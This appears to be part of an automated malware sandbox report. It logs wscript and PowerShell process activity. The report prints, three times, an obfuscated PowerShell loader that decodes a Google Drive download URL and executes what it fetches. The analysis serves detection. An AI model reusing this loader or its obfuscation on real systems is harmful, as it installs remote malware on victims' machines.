              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Julemessens)$global:Thomist = [System.Text.Encoding]::ASCII.GetString($Explicability)$global:opsttende=$Thomist.substring($Eksekverbare,$trikstank)<#Guldmedaljernes Denaturering Twa
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio FritlJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B22CFE8 push esp; retf 2_2_00007FFB4B22CFE9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2F4DC9 push ebx; ret 2_2_00007FFB4B2F4F5A
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
